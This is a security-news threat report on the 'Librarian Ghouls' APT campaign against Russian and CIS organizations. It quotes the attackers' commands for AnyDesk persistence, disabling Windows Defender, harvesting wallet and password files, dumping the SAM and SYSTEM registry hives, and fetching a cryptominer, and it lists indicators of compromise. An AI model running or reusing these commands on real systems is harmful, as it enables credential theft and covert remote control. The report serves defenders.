APT Group ‘Librarian Ghouls’ Launches Active Attacks on Organizations to Deploy Malware

A prominent advanced persistent threat (APT) group known as “Librarian Ghouls” also referenced in recent security bulletins as “Rare Werewolf” and “Rezet” has launched a wave of highly targeted cyberattacks against Russian and CIS-based organizations, as detailed in recent security research.

As of May 2025, these attacks continue unabated, with hundreds of victims reported, including industrial enterprises and educational institutions in Russia, Belarus, and Kazakhstan.

The group stands out for its sophisticated use of legitimate software and utilities, rather than custom malware binaries, to establish persistence, exfiltrate sensitive data, and deploy cryptocurrency miners on victims’ systems.

Technical Overview of the Attacks

Initial Infection and Payload Deployment

Librarian Ghouls’ main infection vector is carefully crafted phishing emails sent to targeted Russian-speaking organizations. These emails contain password protected ZIP or RAR archives, which are often disguised as official business documents such as payment orders or invoices.

Recipients are instructed to open these attachments; the password for the archive is conveniently included within the email itself.

Once extracted, the archive contains a self-extracting installer (SFX) built using the Smart Install Maker tool for Windows. This installer unpacks several files onto the victim’s system:

• data.cab (an archive containing additional payloads)
• installer.config (a configuration file with malicious logic)
• runtime.cab (an empty or decoy file)

Upon execution, the installer deploys a legitimate window management utility, 4t Tray Minimizer, which allows processes to run invisibly in the system tray, masking the intruders’ presence. The software is installed in the background, and its use is camouflaged as benign system activity.

File Deployments and Script Execution

The installer extracts files from data.cab into the C:\Intel directory. Notable files include:

• Payment Order #131.pdf (a decoy document)
• curl.exe (the legitimate curl utility for network transfers)
• AnyDesk\bat.lnk (a shortcut leveraging the AnyDesk remote desktop tool)

Once unpacked, the installer executes a rezet.cmd command script. This script reaches out to the command-and-control (C2) server at downdown[.]ru, downloading files with .JPG extensions but renaming them upon retrieval:

• driver.exe (a customized, silent version of WinRAR)
• blat.exe (Blat, a utility for sending files via email)
• svchost.exe (the legitimate AnyDesk remote access tool)
• Trays.rar (an archive containing further components)
• wol.ps1 (a PowerShell script for scheduling tasks)
• dc.exe (Defender Control, for disabling Windows Defender)

The script then uses driver.exe to extract Trays.rar, which contains a shortcut to minimize 4t Tray Minimizer, further hiding malicious activity.

Installation of AnyDesk and Scheduled Tasks

The attackers install AnyDesk remotely, setting an unattended access password for persistence:

textecho QWERTY1234566 | AnyDesk.exe --set-password _unattended_access

To disable Windows Defender and ensure continued stealth:

text%SYSTEMDRIVE%\Intel\dc.exe /D

A notable scheduled task is created to shut down the victim’s computer every day at 5 AM:

textschtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

PowerShell Automation and Wake-up Script

A PowerShell script, wol.ps1, is executed to launch Microsoft Edge every day at 1 AM. This innocuous-seeming action ensures the victim’s machine is awake during the attackers’ window of opportunity (between 1 AM and 5 AM):

powershell$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

By waking the machine and launching Edge, attackers ensure it is available for remote control via AnyDesk during these hours.

Data Exfiltration and Credential Theft

The group’s BAT scripts collect sensitive data using the customized WinRAR-based driver.exe utility:

text%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup

These commands extract wallet credentials, seed phrases, and sensitive documents, archiving them into password-protected RAR files. Registry keys for authentication (HKLM\SAM, HKLM\SYSTEM) are also dumped.

Miner Deployment and Cleanup

The script then deploys a cryptocurrency miner. It downloads and installs an installer from hxxp://bmapps[.]org/bmcontrol/win64/Install.exe, which fetches mining tools from an archive:

textbmcontrol.exe: miner controller
run.exe, stop.cmd, uninstall.cmd: tools for starting, stopping, and removing the controller
XMRig miner

The miner is configured via a bm.json file, which includes pool information and the attacker’s ID. The controller (bmcontrol.exe) runs persistently, monitoring the mining process and restarting it if it fails.

Before self-deleting, the BAT script removes traces of the attack from the victim’s system.

Attackers’ Use of Legitimate Tools and Evasion Tactics

Librarian Ghouls stands out for its heavy reliance on legitimate third-party software to avoid detection and attribution. Tools such as Mipko Personal Monitor, WebBrowserPassView, ngrok, and NirCmd are used for data exfiltration, credential theft, and persistence. This “living off the land” approach complicates attribution and detection, as the tools themselves are not malicious.

Phishing and Infrastructure

The group maintains phishing portals at domains like users-mail[.]ru and deauthorization[.]online, designed to harvest credentials for the mail.ru email service. Their C2 infrastructure is hosted at downdown[.]ru and dragonfires[.]ru, both resolving to 185.125.51[.]5.

Ongoing Threat and Mitigation

As of May 2025, Librarian Ghouls remains active, with frequent updates to their implant configurations and a large collection of sample files (over 100 identified).

Organizations in Russia and the CIS should be vigilant training employees on phishing, monitoring for unusual scheduled tasks or network traffic, and applying strict endpoint controls can mitigate risk.

Security teams should be aware of the use of legitimate tools for malicious purposes, and watch for indicators such as unexpected installations of AnyDesk, 4t Tray Minimizer, or the presence of suspicious files in the C:\Intel directory.

Indicators of compromise

Implants

d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68
2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b
de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e
c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351
53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04